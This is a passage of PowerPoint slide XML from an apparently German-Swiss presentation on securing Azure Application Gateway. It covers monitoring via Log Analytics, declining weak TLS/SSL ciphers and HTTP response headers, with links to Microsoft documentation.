              <a:t>Monitoring</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Textfeld 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B738B43F-88FB-072C-BCB9-03A1BF8EFC63}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1088136" y="6286500"/>
            <a:ext cx="5073250" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-CH" sz="1000" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://learn.microsoft.com/en-us/security/benchmark/azure/baselines/application-gateway-security-baseline</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Inhaltsplatzhalter 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0F17B037-35CB-24CA-F5C2-251E89EFC3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5966" y="2413341"/>
            <a:ext cx="840702" cy="840702"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="11" name="Gerade Verbindung mit Pfeil 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E63039EF-E7D3-F175-BD4F-6F8707A55F8F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:endCxn id="6" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2002138" y="2833692"/>
            <a:ext cx="10438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131FCC20-A607-99CF-4FDC-3906199EDD86}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="6" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3886668" y="2833692"/>
            <a:ext cx="14817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1" name="Grafik 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C34266FF-55BA-8EF7-DD14-D7F26A4091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20757" y="2441408"/>
            <a:ext cx="640629" cy="640629"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="23" name="Grafik 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7BEF3C33-5CB0-4F1F-48D1-08CA3186C2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81100" y="2368371"/>
            <a:ext cx="670209" cy="670209"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Grafik 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{68333041-D565-0612-1DCC-3DBBD30C740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13240" y="4522012"/>
            <a:ext cx="706151" cy="706151"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Textfeld 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B2EBD506-01DC-A822-93C7-55742A4A1611}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3009115" y="5355392"/>
            <a:ext cx="914399" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="de-CH" sz="1200" dirty="0"/>
              <a:t>Monitor</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="8" name="Gerade Verbindung mit Pfeil 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A301B6D8-B1DA-1BF6-B80B-B945B5F07566}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="3468771" y="3346016"/>
            <a:ext cx="20630" cy="10797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C96DB1F9-53DF-263A-FB12-7ECB7847E6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540799" y="3109908"/>
            <a:ext cx="336745" cy="336745"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="17" name="Gerade Verbindung mit Pfeil 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8BF6AAEC-4F2E-4B08-2514-03625A235AAF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2002138" y="4865803"/>
            <a:ext cx="1043828" cy="25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6" name="Grafik 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F07D26B7-3C72-9502-0FFE-1C447FECB85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26515" y="4461421"/>
            <a:ext cx="654346" cy="654346"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Textfeld 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{291DA0B2-3A8B-B622-AB5E-B63AE4A5474F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1096488" y="5301841"/>
            <a:ext cx="914399" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="de-CH" sz="1200" dirty="0"/>
              <a:t>Admin</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="Textfeld 29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{426CA9A4-723E-2FB3-E4FB-7F98C8806B51}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1096488" y="3109063"/>
            <a:ext cx="914399" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="de-CH" sz="1200" dirty="0"/>
              <a:t>User</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="37" name="Grafik 36" descr="Umschlag mit einfarbiger Füllung">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EA519981-0143-8E87-15C9-0EEE2EA214DF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId15" cstate="email">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2285692" y="4891694"/>
            <a:ext cx="506206" cy="506206"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="39" name="Grafik 38" descr="Blitz mit einfarbiger Füllung">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D77207AC-17CA-9EB4-0DF3-23D982A13835}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId17" cstate="email">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2861566" y="5025690"/>
            <a:ext cx="336742" cy="336742"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="41" name="Grafik 40">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4AE658C3-9938-9ABB-F8A7-E70EEAA9710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347335" y="4170265"/>
            <a:ext cx="917830" cy="917830"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43" name="Textfeld 42">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A3AD1CC5-343E-32C0-E030-DF39E6CFA8F5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4129935" y="3460739"/>
            <a:ext cx="914399" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-CH" sz="1200" dirty="0"/>
              <a:t>log</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="46" name="Verbinder: gewinkelt 45">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D7BCF3C0-B1FE-FE3A-7266-0F0809BA3328}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3858288" y="3400946"/>
            <a:ext cx="1433527" cy="130033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532A2019-2E6D-E4D6-CC41-0DC776CDD2B6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="3923514" y="4869568"/>
            <a:ext cx="1368301" cy="81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0" name="Textfeld 59">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CB15F1C9-D1D9-E737-6E5F-6F45B80ACFB2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3854019" y="2493504"/>
            <a:ext cx="1786128" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-CH" sz="1200" dirty="0" err="1"/>
              <a:t>forwarded</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1200" dirty="0" err="1"/>
              <a:t>request</a:t>
            </a:r>
            <a:endParaRPr lang="de-CH" sz="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="61" name="Textfeld 60">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{12023CD7-0206-CB13-222C-D1CDDF02A82C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2031075" y="2469768"/>
            <a:ext cx="914399" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-CH" sz="1200" dirty="0" err="1"/>
              <a:t>request</a:t>
            </a:r>
            <a:endParaRPr lang="de-CH" sz="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="62" name="Textfeld 61">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D103A2C9-8BA8-3301-0FD9-C04CABD593E0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2828237" y="3842954"/>
            <a:ext cx="661164" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-CH" sz="1200" dirty="0" err="1"/>
              <a:t>watch</a:t>
            </a:r>
            <a:endParaRPr lang="de-CH" sz="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="63" name="Textfeld 62">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A11D609-0710-3DB3-9249-FED06A3A1DBE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4281455" y="4907189"/>
            <a:ext cx="661164" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-CH" sz="1200" dirty="0" err="1"/>
              <a:t>watch</a:t>
            </a:r>
            <a:endParaRPr lang="de-CH" sz="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="70" name="Textfeld 69">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0B7D17C6-87E5-F0DC-5463-EED416533130}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5384212" y="3109063"/>
            <a:ext cx="914399" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="de-CH" sz="1200" dirty="0"/>
              <a:t>App</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="91" name="Grafik 90">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E95E3574-AFD7-F55E-4FDF-B08A07836004}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>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069931" y="1631363"/>
            <a:ext cx="4572253" cy="406578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5" name="Textfeld 94">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2B27BF8B-DEE9-8250-2A59-93D737A38840}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5091214" y="5174865"/>
            <a:ext cx="1220831" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="de-CH" sz="1200" dirty="0"/>
              <a:t>Log Analytics Workspace</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="128252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CE4A2F-3568-4306-F575-4B90DF355C58}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-CH" dirty="0" err="1"/>
              <a:t>Decline</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" dirty="0" err="1"/>
              <a:t>weak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" dirty="0"/>
              <a:t> TLS/SSL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" dirty="0" err="1"/>
              <a:t>cipher</a:t>
            </a:r>
            <a:endParaRPr lang="de-CH" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Inhaltsplatzhalter 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9D993466-D635-3E11-7BE3-8C2969A52498}"/>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5670512" y="2061266"/>
            <a:ext cx="5707743" cy="3838575"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Textfeld 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F2C08461-A177-967F-C7BB-E852C18A5B56}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="813745" y="2887084"/>
            <a:ext cx="4179349" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-CH" dirty="0"/>
              <a:t>💡 TIPP: Use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" dirty="0" err="1"/>
              <a:t>predifed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" dirty="0"/>
              <a:t> Policy </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" dirty="0" err="1"/>
              <a:t>settings</a:t>
            </a:r>
            <a:endParaRPr lang="de-CH" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Grafik 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FB416A77-AE4F-E14F-F1BC-46A7EC5DB6F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2839" y="3429000"/>
            <a:ext cx="3782759" cy="23387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feld 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3F6C29A2-D543-BE3C-04F4-3607245E2AA5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5670512" y="5918972"/>
            <a:ext cx="6094378" cy="246221"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-CH" sz="1000" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://learn.microsoft.com/en-us/azure/application-gateway/ssl-overview</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3507451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AE02CDD-7018-1CBD-FBCC-B88C45B91259}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1044516" y="1076635"/>
            <a:ext cx="2009580" cy="3495365"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" cap="all" dirty="0"/>
              <a:t>HTTP Response Header</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="15" name="Straight Connector 14">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Inhaltsplatzhalter 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{20706171-0598-980A-CA09-B0EC112007B3}"/>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l="-4"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3228610" y="1"/>
            <a:ext cx="8963390" cy="6857999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="accent5">
                <a:lumMod val="75000"/>
              </a:schemeClr>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rechteck: abgerundete Ecken 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4005ED1A-B4C4-2DCA-1451-286C57412BB6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3502153" y="3429000"/>
            <a:ext cx="3822192" cy="374904"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="571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de-CH"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rechteck: abgerundete Ecken 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6D95FFF4-604F-CC7C-B59D-D7A66D9AFAB5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3502153" y="6406896"/>
            <a:ext cx="3822192" cy="374904"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="571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de-CH"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
